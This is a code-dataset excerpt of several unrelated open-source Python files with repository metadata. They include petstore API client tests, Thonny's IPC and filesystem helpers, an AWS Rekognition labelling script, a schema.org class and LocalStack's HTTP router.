self.assertEquals(status, 200)
def test_async_exception(self):
self.pet_api.add_pet(self.pet)
thread = self.pet_api.get_pet_by_id(-9999999999999, async_req=True)
exception = None
try:
thread.get()
except ApiException as e:
exception = e
self.assertIsInstance(exception, ApiException)
self.assertEqual(exception.status, 404)
def test_add_pet_and_get_pet_by_id(self):
self.pet_api.add_pet(self.pet)
fetched = self.pet_api.get_pet_by_id(pet_id=self.pet.id)
self.assertIsNotNone(fetched)
self.assertEqual(self.pet.id, fetched.id)
self.assertIsNotNone(fetched.category)
self.assertEqual(self.pet.category.name, fetched.category.name)
def test_add_pet_and_get_pet_by_id_with_http_info(self):
self.pet_api.add_pet(self.pet)
fetched = self.pet_api.get_pet_by_id(
pet_id=self.pet.id,
_return_http_data_only=False
)
self.assertIsNotNone(fetched)
self.assertEqual(self.pet.id, fetched[0].id)
self.assertIsNotNone(fetched[0].category)
self.assertEqual(self.pet.category.name, fetched[0].category.name)
def test_update_pet(self):
self.pet.name = "hello kity with updated"
self.pet_api.update_pet(self.pet)
fetched = self.pet_api.get_pet_by_id(pet_id=self.pet.id)
self.assertIsNotNone(fetched)
self.assertEqual(self.pet.id, fetched.id)
self.assertEqual(self.pet.name, fetched.name)
self.assertIsNotNone(fetched.category)
self.assertEqual(fetched.category.name, self.pet.category.name)
def test_find_pets_by_status(self):
self.pet_api.add_pet(self.pet)
self.assertIn(
self.pet.id,
list(map(lambda x: getattr(x, 'id'), self.pet_api.find_pets_by_status(status=[self.pet.status])))
)
def test_find_pets_by_tags(self):
self.pet_api.add_pet(self.pet)
self.assertIn(
self.pet.id,
list(map(lambda x: getattr(x, 'id'), self.pet_api.find_pets_by_tags(tags=[self.tag.name])))
)
def test_update_pet_with_form(self):
self.pet_api.add_pet(self.pet)
name = "hello kity with form updated"
status = "pending"
self.pet_api.update_pet_with_form(pet_id=self.pet.id, name=name, status=status)
fetched = self.pet_api.get_pet_by_id(pet_id=self.pet.id)
self.assertEqual(self.pet.id, fetched.id)
self.assertEqual(name, fetched.name)
self.assertEqual(status, fetched.status)
def test_upload_file(self):
# upload file with form parameter
file_path1 = os.path.join(self.test_file_dir, "1px_pic1.png")
file_path2 = os.path.join(self.test_file_dir, "1px_pic2.png")
try:
file = open(file_path1, "rb")
additional_metadata = "special"
self.pet_api.upload_file(
pet_id=self.pet.id,
additional_metadata=additional_metadata,
file=file
)
except ApiException as e:
self.fail("upload_file() raised {0} unexpectedly".format(type(e)))
finally:
file.close()
# upload only one file
try:
file = open(file_path1, "rb")
self.pet_api.upload_file(pet_id=self.pet.id, file=file)
except ApiException as e:
self.fail("upload_file() raised {0} unexpectedly".format(type(e)))
finally:
file.close()
# upload multiple files
HTTPResponse = namedtuple(
'urllib3_response_HTTPResponse',
['status', 'reason', 'data', 'getheaders', 'getheader']
)
headers = {}
def get_headers():
return headers
def get_header(name, default=None):
return headers.get(name, default)
api_respponse = {
'code': 200,
'type': 'blah',
'message': 'file upload succeeded'
}
http_response = HTTPResponse(
status=200,
reason='OK',
data=json.dumps(api_respponse),
getheaders=get_headers,
getheader=get_header
)
mock_response = RESTResponse(http_response)
try:
file1 = open(file_path1, "rb")
file2 = open(file_path2, "rb")
with patch.object(RESTClientObject, 'request') as mock_method:
mock_method.return_value = mock_response
res = self.pet_api.upload_file(
pet_id=684696917, files=[file1, file2])
mock_method.assert_called_with(
'POST',
'http://localhost/v2/pet/684696917/uploadImage',
_preload_content=True,
_request_timeout=None,
body=None,
headers={
'Accept': 'application/json',
'Content-Type': 'multipart/form-data',
'User-Agent': 'OpenAPI-Generator/1.0.0/python',
'Authorization': 'Bearer '
},
post_params=[
('files', ('1px_pic1.png', b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x00\x00\x00\x00:~\x9bU\x00\x00\x00\nIDATx\x9cc\xfa\x0f\x00\x01\x05\x01\x02\xcf\xa0.\xcd\x00\x00\x00\x00IEND\xaeB`\x82', 'image/png')),
('files', ('1px_pic2.png', b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x00\x00\x00\x00:~\x9bU\x00\x00\x00\nIDATx\x9cc\xfa\x0f\x00\x01\x05\x01\x02\xcf\xa0.\xcd\x00\x00\x00\x00IEND\xaeB`\x82', 'image/png'))
],
query_params=[]
)
except ApiException as e:
self.fail("upload_file() raised {0} unexpectedly".format(type(e)))
finally:
file1.close()
file2.close()
# passing in an array of files to when file only allows one
# raises an exceptions
try:
file = open(file_path1, "rb")
with self.assertRaises(ApiTypeError) as exc:
self.pet_api.upload_file(pet_id=self.pet.id, file=[file])
finally:
file.close()
# passing in a single file when an array of file is required
# raises an exception
try:
file = open(file_path1, "rb")
with self.assertRaises(ApiTypeError) as exc:
self.pet_api.upload_file(pet_id=self.pet.id, files=file)
finally:
file.close()
# passing in a closed file raises an exception
with self.assertRaises(ApiValueError) as exc:
file = open(file_path1, "rb")
file.close()
self.pet_api.upload_file(pet_id=self.pet.id, file=file)
def test_delete_pet(self):
self.pet_api.add_pet(self.pet)
self.pet_api.delete_pet(pet_id=self.pet.id, api_key="special-key")
try:
self.pet_api.get_pet_by_id(pet_id=self.pet.id)
raise Exception("expected an error")
except ApiException as e:
self.assertEqual(404, e.status)
if __name__ == '__main__':
unittest.main()
| 37
| 259
| 0.616131
|
9628136159b638002b4272c62d6618369ccb909d
| 46
|
py
|
Python
|
scPrivacy_code/__init__.py
|
bm2-lab/scPrivacy
|
444c8f3a5e7b890c299cd823359e5414f73d6205
|
[
"MIT"
] | 1
|
2022-03-10T02:58:17.000Z
|
2022-03-10T02:58:17.000Z
|
scPrivacy_code/__init__.py
|
bm2-lab/scPrivacy
|
444c8f3a5e7b890c299cd823359e5414f73d6205
|
[
"MIT"
] | null | null | null |
scPrivacy_code/__init__.py
|
bm2-lab/scPrivacy
|
444c8f3a5e7b890c299cd823359e5414f73d6205
|
[
"MIT"
] | null | null | null |
from .scPrivacy import *
__version__ = '1.0'
| 11.5
| 24
| 0.695652
|
e7c228ae4f48a2e01a6b6423b12a9c999fa73423
| 15,044
|
py
|
Python
|
thonny/common.py
|
aroberge/thonny
|
919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28
|
[
"MIT"
] | null | null | null |
thonny/common.py
|
aroberge/thonny
|
919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28
|
[
"MIT"
] | null | null | null |
thonny/common.py
|
aroberge/thonny
|
919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Classes used both by front-end and back-end
"""
import os.path
import platform
import site
import sys
import tokenize
from collections import namedtuple
from typing import List, Optional # @UnusedImport
import subprocess
import logging
MESSAGE_MARKER = "\x02"
ValueInfo = namedtuple("ValueInfo", ["id", "repr"])
FrameInfo = namedtuple(
"FrameInfo",
[
"id",
"filename",
"module_name",
"code_name",
"source",
"lineno",
"firstlineno",
"in_library",
"locals",
"globals",
"freevars",
"event",
"focus",
"node_tags",
"current_statement",
"current_root_expression",
"current_evaluations",
],
)
TextRange = namedtuple(
"TextRange", ["lineno", "col_offset", "end_lineno", "end_col_offset"]
)
class Record:
def __init__(self, **kw):
self.__dict__.update(kw)
def update(self, e, **kw):
self.__dict__.update(e, **kw)
def setdefault(self, **kw):
"updates those fields that are not yet present (similar to dict.setdefault)"
for key in kw:
if not hasattr(self, key):
setattr(self, key, kw[key])
def get(self, key, default=None):
return self.__dict__.get(key, default)
def __getitem__(self, key):
return self.__dict__[key]
def __delitem__(self, key):
self.__dict__.__delitem__(key)
def __setitem__(self, key, value):
self.__dict__[key] = value
def __contains__(self, key):
return key in self.__dict__
def __repr__(self):
keys = self.__dict__.keys()
items = ("{}={!r}".format(k, self.__dict__[k]) for k in keys)
return "{}({})".format(self.__class__.__name__, ", ".join(items))
def __str__(self):
keys = sorted(self.__dict__.keys())
items = ("{}={!r}".format(k, str(self.__dict__[k])) for k in keys)
return "{}({})".format(self.__class__.__name__, ", ".join(items))
def __eq__(self, other):
# pylint: disable=unidiomatic-typecheck
if type(self) != type(other):
return False
if len(self.__dict__) != len(other.__dict__):
return False
for key in self.__dict__:
if not hasattr(other, key):
return False
self_value = getattr(self, key)
other_value = getattr(other, key)
if type(self_value) != type(other_value) or self_value != other_value:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(repr(self))
def range_contains_smaller(one: TextRange, other: TextRange) -> bool:
this_start = (one.lineno, one.col_offset)
this_end = (one.end_lineno, one.end_col_offset)
other_start = (other.lineno, other.col_offset)
other_end = (other.end_lineno, other.end_col_offset)
return (
this_start < other_start
and this_end > other_end
or this_start == other_start
and this_end > other_end
or this_start < other_start
and this_end == other_end
)
def range_contains_smaller_or_equal(one: TextRange, other: TextRange) -> bool:
return range_contains_smaller(one, other) or one == other
class InputSubmission(Record):
"""For sending data to backend's stdin"""
def __init__(self, data: str, **kw) -> None:
super().__init__(**kw)
self.data = data
class CommandToBackend(Record):
"""Command meant for the back-end"""
def __init__(self, name: str, **kw) -> None:
super().__init__(**kw)
self.name = name
class ToplevelCommand(CommandToBackend):
def __init__(self, name: str, argv: List[str] = [], **kw) -> None:
super().__init__(name, **kw)
self.argv = argv
class DebuggerCommand(CommandToBackend):
pass
class InlineCommand(CommandToBackend):
"""
Can be used both during debugging and in waiting_toplevel_command state
(eg. for sending variable and heap info requests)
"""
pass
class MessageFromBackend(Record):
def __init__(self, **kw) -> None:
self.event_type = type(self).__name__ # allow event_type to be overridden by kw
super().__init__(**kw)
if not hasattr(self, "sequence"):
self.sequence = self.event_type
class ToplevelResponse(MessageFromBackend):
pass
class DebuggerResponse(MessageFromBackend):
pass
class BackendEvent(MessageFromBackend):
def __init__(self, event_type: str, **kw) -> None:
super().__init__(**kw)
self.event_type = event_type
class InlineResponse(MessageFromBackend):
def __init__(self, command_name: str, **kw) -> None:
super().__init__(**kw)
self.command_name = command_name
self.event_type = self.command_name + "_response"
def serialize_message(msg: Record) -> str:
# I want to transfer only ASCII chars because encodings are not reliable
# (eg. can't find a way to specify PYTHONIOENCODING for cx_freeze'd program)
return MESSAGE_MARKER + repr(msg).encode("UTF-7").decode("ASCII")
def parse_message(msg_string: str) -> Record:
# DataFrames may have nan
# pylint: disable=unused-variable
nan = float("nan") # @UnusedVariable
assert msg_string[0] == MESSAGE_MARKER
return eval(msg_string[1:].encode("ASCII").decode("UTF-7"))
def normpath_with_actual_case(name: str) -> str:
"""In Windows return the path with the case it is stored in the filesystem"""
assert os.path.isabs(name) or os.path.ismount(name), "Not abs nor mount: " + name
assert os.path.exists(name)
if os.name == "nt":
name = os.path.realpath(name)
from ctypes import create_unicode_buffer, windll
buf = create_unicode_buffer(512)
windll.kernel32.GetShortPathNameW(name, buf, 512) # @UndefinedVariable
windll.kernel32.GetLongPathNameW(buf.value, buf, 512) # @UndefinedVariable
if len(buf.value):
result = buf.value
else:
result = name
assert isinstance(result, str)
if result[1] == ":":
# ensure drive letter is capital
return result[0].upper() + result[1:]
else:
return result
else:
return os.path.normpath(name)
def is_same_path(name1: str, name2: str) -> bool:
return os.path.normpath(os.path.normcase(name1)) == os.path.normpath(
os.path.normcase(name2)
)
def path_startswith(child_name: str, dir_name: str) -> bool:
normchild = os.path.normpath(os.path.normcase(child_name))
normdir = os.path.normpath(os.path.normcase(dir_name))
return normdir == normchild or normchild.startswith(
normdir.rstrip(os.path.sep) + os.path.sep
)
def read_source(filename):
with tokenize.open(filename) as fp:
return fp.read()
def get_exe_dirs():
result = []
if site.ENABLE_USER_SITE:
if platform.system() == "Windows":
if site.getusersitepackages():
result.append(
site.getusersitepackages().replace("site-packages", "Scripts")
)
else:
if site.getuserbase():
result.append(site.getuserbase() + "/bin")
main_scripts = os.path.join(sys.prefix, "Scripts")
if os.path.isdir(main_scripts) and main_scripts not in result:
result.append(main_scripts)
if os.path.dirname(sys.executable) not in result:
result.append(os.path.dirname(sys.executable))
return result
def get_site_dir(symbolic_name, executable=None):
if not executable or executable == sys.executable:
result = getattr(site, symbolic_name, "")
else:
result = (
subprocess.check_output(
[
executable,
"-m",
"site",
"--" + symbolic_name.lower().replace("_", "-"),
],
universal_newlines=True,
)
.decode()
.strip()
)
return result if result else None
def get_base_executable():
if sys.exec_prefix == sys.base_exec_prefix:
return sys.executable
if platform.system() == "Windows":
result = sys.base_exec_prefix + "\\" + os.path.basename(sys.executable)
result = normpath_with_actual_case(result)
else:
result = sys.executable.replace(sys.exec_prefix, sys.base_exec_prefix)
if not os.path.isfile(result):
raise RuntimeError("Can't locate base executable")
return result
def get_augmented_system_path(extra_dirs):
path_items = os.environ.get("PATH", "").split(os.pathsep)
for d in reversed(extra_dirs):
if d not in path_items:
path_items.insert(0, d)
return os.pathsep.join(path_items)
def update_system_path(env, value):
# in Windows, env keys are not case sensitive
# this is important if env is a dict (not os.environ)
if platform.system() == "Windows":
found = False
for key in env:
if key.upper() == "PATH":
found = True
env[key] = value
if not found:
env["PATH"] = value
else:
env["PATH"] = value
class UserError(RuntimeError):
"""Errors of this class are meant to be presented without stacktrace"""
pass
def is_hidden_or_system_file(path: str) -> bool:
if os.path.basename(path).startswith("."):
return True
elif platform.system() == "Windows":
from ctypes import windll
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
return bool(
windll.kernel32.GetFileAttributesW(path) # @UndefinedVariable
& (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM)
)
else:
return False
def get_dirs_child_data(paths):
"""Used for populating local file browser's tree view.
dir_paths contains full paths of the open directories.
Returns information required for refreshing this view"""
res = {}
for path in paths:
# assuming the path already has actual case
res[path] = get_single_dir_child_data(path)
return res
def get_single_dir_child_data(path):
if path == "":
if platform.system() == "Windows":
get_windows_network_locations()
return {**get_windows_volumes_info(), **get_windows_network_locations()}
else:
return get_single_dir_child_data("/")
elif os.path.isdir(path) or os.path.ismount(path):
result = {}
try:
for child in os.listdir(path):
full_child_path = normpath_with_actual_case(os.path.join(path, child))
if not is_hidden_or_system_file(full_child_path):
st = os.stat(full_child_path, dir_fd=None, follow_symlinks=True)
name = os.path.basename(full_child_path)
result[name] = {
"size": None if os.path.isdir(full_child_path) else st.st_size,
"time": max(st.st_mtime, st.st_ctime),
}
except PermissionError:
result["<not accessible>"] = {"kind": "error", "size": -1, "time": None}
return result
elif os.path.isfile(path):
return "file"
else:
return "missing"
def get_windows_volumes_info():
# http://stackoverflow.com/a/2288225/261181
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa364939%28v=vs.85%29.aspx
import string
from ctypes import windll
all_drive_types = [
"DRIVE_UNKNOWN",
"DRIVE_NO_ROOT_DIR",
"DRIVE_REMOVABLE",
"DRIVE_FIXED",
"DRIVE_REMOTE",
"DRIVE_CDROM",
"DRIVE_RAMDISK",
]
required_drive_types = [
"DRIVE_REMOVABLE",
"DRIVE_FIXED",
"DRIVE_REMOTE",
"DRIVE_RAMDISK",
]
result = {}
bitmask = windll.kernel32.GetLogicalDrives() # @UndefinedVariable
for letter in string.ascii_uppercase:
drive_type = all_drive_types[
windll.kernel32.GetDriveTypeW("%s:\\" % letter)
] # @UndefinedVariable
if bitmask & 1 and drive_type in required_drive_types:
drive = letter + ":"
path = drive + "\\"
volume_name = get_windows_volume_name(path)
if not volume_name:
volume_name = "Local Disk"
label = volume_name + " (" + drive + ")"
try:
st = os.stat(path)
result[path] = {
"label": label,
"size": None,
"time": max(st.st_mtime, st.st_ctime),
}
except PermissionError:
# probably an empty cardreader slot
pass
bitmask >>= 1
return result
def get_windows_volume_name(path):
# https://stackoverflow.com/a/12056414/261181
import ctypes
kernel32 = ctypes.windll.kernel32
volume_name_buffer = ctypes.create_unicode_buffer(1024)
file_system_name_buffer = ctypes.create_unicode_buffer(1024)
serial_number = None
max_component_length = None
file_system_flags = None
result = kernel32.GetVolumeInformationW(
ctypes.c_wchar_p(path),
volume_name_buffer,
ctypes.sizeof(volume_name_buffer),
serial_number,
max_component_length,
file_system_flags,
file_system_name_buffer,
ctypes.sizeof(file_system_name_buffer),
)
if result:
return volume_name_buffer.value
else:
return None
def get_windows_network_locations():
import ctypes.wintypes
CSIDL_NETHOOD = 0x13
SHGFP_TYPE_CURRENT = 0
buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
ctypes.windll.shell32.SHGetFolderPathW(0, CSIDL_NETHOOD, 0, SHGFP_TYPE_CURRENT, buf)
shortcuts_dir = buf.value
result = {}
for entry in os.scandir(shortcuts_dir):
# full_path = normpath_with_actual_case(entry.path)
lnk_path = os.path.join(entry.path, "target.lnk")
if os.path.exists(lnk_path):
try:
target = get_windows_lnk_target(lnk_path)
result[target] = {
"label": entry.name + " (" + target + ")",
"size": None,
"time": None,
}
except:
logging.getLogger("thonny").error(
"Can't get target from %s", lnk_path, exc_info=True
)
return result
def get_windows_lnk_target(lnk_file_path):
import thonny
script_path = os.path.join(
os.path.dirname(thonny.__file__), "res", "PrintLnkTarget.vbs"
)
cmd = ["cscript", "/NoLogo", script_path, lnk_file_path]
result = subprocess.check_output(cmd, universal_newlines=True, timeout=3)
return result.strip()
| 28.278195
| 88
| 0.607684
|
f100599cd575f33e481555c826a169d0be5ca67a
| 3,317
|
py
|
Python
|
custom_humus.py
|
ziniman/aws-rekognition-demo
|
5cee9a47531e80c42525dfc134cf89bd40313cc1
|
[
"Apache-2.0"
] | 11
|
2018-08-14T17:57:36.000Z
|
2021-03-06T14:54:28.000Z
|
custom_humus.py
|
ziniman/aws-rekognition-demo
|
5cee9a47531e80c42525dfc134cf89bd40313cc1
|
[
"Apache-2.0"
] | null | null | null |
custom_humus.py
|
ziniman/aws-rekognition-demo
|
5cee9a47531e80c42525dfc134cf89bd40313cc1
|
[
"Apache-2.0"
] | 5
|
2018-06-07T20:08:12.000Z
|
2021-02-24T09:56:50.000Z
|
#!/usr/bin/python
#Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#PDX-License-Identifier: MIT-0 (For details, see https://github.com/awsdocs/amazon-rekognition-developer-guide/blob/master/LICENSE-SAMPLECODE.)
import boto3
import io
from PIL import Image, ImageDraw, ExifTags, ImageColor, ImageFont
region = 'us-east-1'
def show_custom_labels(model,bucket,photo, min_confidence):
client=boto3.client('rekognition', region_name=region)
# Load image from S3 bucket
s3_connection = boto3.resource('s3')
s3_object = s3_connection.Object(bucket,photo)
s3_response = s3_object.get()
stream = io.BytesIO(s3_response['Body'].read())
image=Image.open(stream)
#Call DetectCustomLabels
response = client.detect_custom_labels(Image={'S3Object': {'Bucket': bucket, 'Name': photo}},
MinConfidence=min_confidence,
ProjectVersionArn=model)
imgWidth, imgHeight = image.size
draw = ImageDraw.Draw(image)
# calculate and display bounding boxes for each detected custom label
print('Detected custom labels for ' + photo)
max_w = 0
c = 0
largest = 0
for customLabel in response['CustomLabels']:
print('Label ' + str(customLabel['Name']))
print('Confidence ' + str(customLabel['Confidence']))
if customLabel['Name'] == 'Humus' and 'Geometry' in customLabel:
box = customLabel['Geometry']['BoundingBox']
width = imgWidth * box['Width']
if width>max_w:
largest = c
max_w = width
c += 1
print(largest)
customLabel = response['CustomLabels'][largest]
print('Label ' + str(customLabel['Name']))
print('Confidence ' + str(customLabel['Confidence']))
if customLabel['Name'] == 'Humus' and 'Geometry' in customLabel:
box = customLabel['Geometry']['BoundingBox']
left = imgWidth * box['Left']
top = imgHeight * box['Top']
width = imgWidth * box['Width']
height = imgHeight * box['Height']
if width>max_w:
largest = c
max_w = width
fnt = ImageFont.truetype('/Library/Fonts/Arial.ttf', 30)
if customLabel['Name'] == 'Humus':
color = '#00cc00'
else:
color = '#d40000'
draw.text((left+10,top+10), customLabel['Name'] + ' - ' + str(customLabel['Confidence']) + '%', fill=color, font=fnt)
print('Left: ' + '{0:.0f}'.format(left))
print('Top: ' + '{0:.0f}'.format(top))
print('Face Width: ' + "{0:.0f}".format(width))
print('Face Height: ' + "{0:.0f}".format(height))
points = (
(left,top),
(left + width, top),
(left + width, top + height),
(left , top + height),
(left, top))
draw.line(points, fill=color, width=3)
image.show()
return len(response['CustomLabels'])
def main():
bucket="sagemaker-humus"
photo="Humus/libat.jpg"
model='arn:aws:rekognition:us-east-1:397652707012:project/Real_Humus/version/Real_Humus.2019-12-24T15.41.28/1577194888945'
min_confidence=50
label_count=show_custom_labels(model,bucket,photo, min_confidence)
print("Custom labels detected: " + str(label_count))
if __name__ == "__main__":
main()
| 30.431193
| 143
| 0.617124
|
4076477ef9e73ca8a602e67ed2b9875d30928b6f
| 2,348
|
py
|
Python
|
PreprocessData/all_class_files/TelevisionStation.py
|
wkid-neu/Schema
|
4854720a15894dd814691a55e03329ecbbb6f558
|
[
"MIT"
] | 3
|
2021-11-06T12:29:05.000Z
|
2022-03-22T12:48:55.000Z
|
PreprocessData/all_class_files/TelevisionStation.py
|
DylanNEU/Schema
|
4854720a15894dd814691a55e03329ecbbb6f558
|
[
"MIT"
] | null | null | null |
PreprocessData/all_class_files/TelevisionStation.py
|
DylanNEU/Schema
|
4854720a15894dd814691a55e03329ecbbb6f558
|
[
"MIT"
] | 1
|
2021-11-06T12:29:12.000Z
|
2021-11-06T12:29:12.000Z
|
from PreprocessData.all_class_files.LocalBusiness import LocalBusiness
import global_data
class TelevisionStation(LocalBusiness):
def __init__(self, additionalType=None, alternateName=None, description=None, disambiguatingDescription=None, identifier=None, image=None, mainEntityOfPage=None, name=None, potentialAction=None, sameAs=None, url=None, address=None, aggregateRating=None, alumni=None, areaServed=None, award=None, brand=None, contactPoint=None, department=None, dissolutionDate=None, duns=None, email=None, employee=None, event=None, faxNumber=None, founder=None, foundingDate=None, foundingLocation=None, funder=None, globalLocationNumber=None, hasOfferCatalog=None, hasPOS=None, isicV4=None, legalName=None, leiCode=None, location=None, logo=None, makesOffer=None, member=None, memberOf=None, naics=None, numberOfEmployees=None, owns=None, parentOrganization=None, publishingPrinciples=None, review=None, seeks=None, sponsor=None, subOrganization=None, taxID=None, telephone=None, vatID=None, additionalProperty=None, amenityFeature=None, branchCode=None, containedInPlace=None, containsPlace=None, geo=None, hasMap=None, isAccessibleForFree=None, maximumAttendeeCapacity=None, openingHoursSpecification=None, photo=None, publicAccess=None, smokingAllowed=None, specialOpeningHoursSpecification=None, currenciesAccepted=None, openingHours=None, paymentAccepted=None, priceRange=None):
LocalBusiness.__init__(self, additionalType, alternateName, description, disambiguatingDescription, identifier, image, mainEntityOfPage, name, potentialAction, sameAs, url, address, aggregateRating, alumni, areaServed, award, brand, contactPoint, department, dissolutionDate, duns, email, employee, event, faxNumber, founder, foundingDate, foundingLocation, funder, globalLocationNumber, hasOfferCatalog, hasPOS, isicV4, legalName, leiCode, location, logo, makesOffer, member, memberOf, naics, numberOfEmployees, owns, parentOrganization, publishingPrinciples, review, seeks, sponsor, subOrganization, taxID, telephone, vatID, additionalProperty, amenityFeature, branchCode, containedInPlace, containsPlace, geo, hasMap, isAccessibleForFree, maximumAttendeeCapacity, openingHoursSpecification, photo, publicAccess, smokingAllowed, specialOpeningHoursSpecification, currenciesAccepted, openingHours, paymentAccepted, priceRange)
| 293.5
| 1,273
| 0.832624
|
428fbea6bcc5942bbf0d4bc9763ab30177e6aa37
| 8,997
|
py
|
Python
|
localstack/http/router.py
|
TheRakeshPurohit/localstack
|
063e07827934a7c7ff00e6d7cf6e243bcce0eb99
|
[
"Apache-2.0"
] | null | null | null |
localstack/http/router.py
|
TheRakeshPurohit/localstack
|
063e07827934a7c7ff00e6d7cf6e243bcce0eb99
|
[
"Apache-2.0"
] | null | null | null |
localstack/http/router.py
|
TheRakeshPurohit/localstack
|
063e07827934a7c7ff00e6d7cf6e243bcce0eb99
|
[
"Apache-2.0"
] | null | null | null |
import functools
import inspect
import threading
from typing import (
Any,
Callable,
Dict,
Generic,
Iterable,
List,
Mapping,
NamedTuple,
Optional,
Protocol,
Type,
TypeVar,
)
from werkzeug.routing import BaseConverter, Map, Rule, RuleFactory
from localstack.utils.common import to_str
from .request import Request
from .response import Response
E = TypeVar("E")
RequestArguments = Mapping[str, Any]
class Dispatcher(Protocol[E]):
"""
A Dispatcher is called when a URL route matches a request. The dispatcher is responsible for appropriately
creating a Response from the incoming Request and the matching endpoint.
"""
def __call__(self, request: Request, endpoint: E, args: RequestArguments) -> Response:
"""
Dispatch the HTTP Request.
:param request: the incoming HTTP request
:param endpoint: the endpoint that matched the URL rule
:param args: the request arguments extracted from the URL rule
:return: an HTTP Response
"""
pass
class _RuleAttributes(NamedTuple):
path: str
host: Optional[str] = (None,)
methods: Optional[Iterable[str]] = None
kwargs: Optional[Dict[str, Any]] = {}
class _RouteEndpoint(Protocol):
"""
An endpoint that encapsulates ``_RuleAttributes`` for the creation of a ``Rule`` inside a ``Router``.
"""
rule_attributes: _RuleAttributes
def __call__(self, *args, **kwargs):
raise NotImplementedError
def route(
path: str, host: Optional[str] = None, methods: Optional[Iterable[str]] = None, **kwargs
) -> Callable[[E], _RouteEndpoint]:
"""
Decorator that indicates that the given function is a Router Rule.
:param path: the path pattern to match
:param host: an optional host matching pattern. if not pattern is given, the rule matches any host
:param methods: the allowed HTTP verbs for this rule
:param kwargs: any other argument that can be passed to ``werkzeug.routing.Rule``
:return: the function endpoint wrapped as a ``_RouteEndpoint``
"""
def wrapper(fn: E):
@functools.wraps(fn)
def route_marker(*args, **kwargs):
return fn(*args, **kwargs)
route_marker.rule_attributes = _RuleAttributes(path, host, methods, kwargs)
return route_marker
return wrapper
def call_endpoint(
request: Request,
endpoint: Callable[[Request, RequestArguments], Response],
args: RequestArguments,
) -> Response:
"""
A Dispatcher that treats the matching endpoint as a callable and invokes it with the Request and request arguments.
"""
return endpoint(request, args)
def _clone_map_without_rules(old: Map) -> Map:
return Map(
default_subdomain=old.default_subdomain,
charset=old.charset,
strict_slashes=old.strict_slashes,
merge_slashes=old.merge_slashes,
redirect_defaults=old.redirect_defaults,
converters=old.converters,
sort_parameters=old.sort_parameters,
sort_key=old.sort_key,
encoding_errors=old.encoding_errors,
host_matching=old.host_matching,
)
class Router(Generic[E]):
"""
A Router is a wrapper around werkzeug's routing Map, that adds convenience methods and additional dispatching
logic via the ``Dispatcher`` Protocol.
"""
url_map: Map
dispatcher: Dispatcher[E]
def __init__(
self, dispatcher: Dispatcher[E] = None, converters: Mapping[str, Type[BaseConverter]] = None
):
self.url_map = Map(
host_matching=True, strict_slashes=False, converters=converters, redirect_defaults=False
)
self.dispatcher = dispatcher or call_endpoint
self._mutex = threading.RLock()
def add(
self,
path: str,
endpoint: E,
host: Optional[str] = None,
methods: Optional[Iterable[str]] = None,
**kwargs,
) -> Rule:
"""
Adds a new Rule to the URL Map.
:param path: the path pattern to match
:param endpoint: the endpoint to invoke
:param host: an optional host matching pattern. if not pattern is given, the rule matches any host
:param methods: the allowed HTTP verbs for this rule
:param kwargs: any other argument that can be passed to ``werkzeug.routing.Rule``
:return:
"""
if host is None and self.url_map.host_matching:
# this creates a "match any" rule, and will put the value of the host
# into the variable "__host__"
host = "<__host__>"
# the typing for endpoint is a str, but the doc states it can be any value,
# however then the redirection URL building will not work
rule = Rule(path, endpoint=endpoint, methods=methods, host=host, **kwargs)
self.add_rule(rule)
return rule
def add_route_endpoint(self, fn: _RouteEndpoint) -> Rule:
"""
Adds a RouteEndpoint (typically a function decorated with ``@route``) as a rule to the router.
:param fn: the RouteEndpoint function
:return: the rule that was added
"""
attr: _RuleAttributes = fn.rule_attributes
return self.add(path=attr.path, endpoint=fn, host=attr.host, **attr.kwargs)
def add_route_endpoints(self, obj: object) -> List[Rule]:
"""
Scans the given object for members that can be used as a `RouteEndpoint` and adds them to the router.
:param obj: the object to scan
:return: the rules that were added
"""
rules = []
members = inspect.getmembers(obj)
for _, member in members:
if hasattr(member, "rule_attributes"):
rules.append(self.add_route_endpoint(member))
return rules
def add_rule(self, rule: RuleFactory):
with self._mutex:
self.url_map.add(rule)
def remove_rule(self, rule: Rule):
"""
Removes a Rule from the Router.
**Caveat**: This is an expensive operation. Removing rules from a URL Map is intentionally not supported by
werkzeug due to issues with thread safety, see https://github.com/pallets/werkzeug/issues/796, and because
using a lock in ``match`` would be too expensive. However, some services that use Routers for routing
internal resources need to be able to remove rules when those resources are removed. So to remove rules we
create a new Map without that rule. This will not prevent the rules from dispatching until the Map has been
completely constructed.
:param rule: the Rule to remove that was previously returned by ``add``.
"""
with self._mutex:
old = self.url_map
if rule not in old._rules:
raise KeyError("no such rule")
new = _clone_map_without_rules(old)
for r in old.iter_rules():
if r == rule:
# this works even with copied rules because of the __eq__ implementation of Rule
continue
new.add(r.empty())
self.url_map = new
def dispatch(self, request: Request) -> Response:
"""
Does the entire dispatching roundtrip, from matching the request to endpoints, and then invoking the endpoint
using the configured dispatcher of the router. For more information on the matching behavior,
see ``werkzeug.routing.MapAdapter.match()``.
:param request: the HTTP request
:return: the HTTP response
"""
matcher = self.url_map.bind(server_name=request.host)
handler, args = matcher.match(
request.path, method=request.method, query_args=to_str(request.query_string)
)
args.pop("__host__", None)
return self.dispatcher(request, handler, args)
def route(
self,
path: str,
host: Optional[str] = None,
methods: Optional[Iterable[str]] = None,
**kwargs,
) -> Callable[[E], _RouteEndpoint]:
"""
Returns a ``route`` decorator and immediately adds it to the router instance. This effectively mimics flask's
``@app.route``.
:param path: the path pattern to match
:param host: an optional host matching pattern. if not pattern is given, the rule matches any host
:param methods: the allowed HTTP verbs for this rule
:param kwargs: any other argument that can be passed to ``werkzeug.routing.Rule``
:return: the function endpoint wrapped as a ``_RouteEndpoint``
"""
def wrapper(fn):
r = route(path, host, methods, **kwargs)
fn = r(fn)
self.add_route_endpoint(fn)
return fn
